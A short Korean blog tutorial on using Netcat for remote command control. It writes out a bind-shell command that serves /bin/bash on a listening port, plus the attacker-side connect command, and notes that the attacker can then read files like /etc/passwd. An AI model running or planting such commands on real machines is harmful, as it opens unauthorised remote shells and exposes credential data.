Netcat 을 이용한 커맨트 컨트롤

Security in CPS/Networking 2021. 6. 17. 11:57

Netcat 은 TCP 또는 UDP 연결을 통해 원격으로 읽기 쓰기를 지원해 주는 네트워크 툴입니다.

Netcat 치트시트는 아래에서 다운로드 가능합니다.

[타켓] 접근하려는 타켓에서 네트워크를 통한 입력값을 기다린다. 아래 코멘드가 리모트로 전달되어 타켓에서 수행이 된다면 해당 머신에 접근이 가능합니다. 다만 옵션의 경우 우분투에서는 지원하지 않아 칼리 리눅스에서 확인하였습니다.

nc -l -p <port> -e '/bin/bash' &

[공격자]

nc <target_IP> <port>

공격자는 이후 /etc/passwd 와 같은 사용자의 민감한 정보에 접근이 가능합니다.

dnsdumpster.com (0)	2021.12.22
Response on HTTP returns 301 (0)	2021.02.24
Host discovery by nmap (0)	2020.12.14
[onos] mvn build 시 .oar 파일이 존재하지 않는 경우 (0)	2020.08.31
Stateless Packet Filtering vs Stateful Packet Filtering (0)	2020.08.26

꿈꾸는 개발자 꿈꾸는 개발자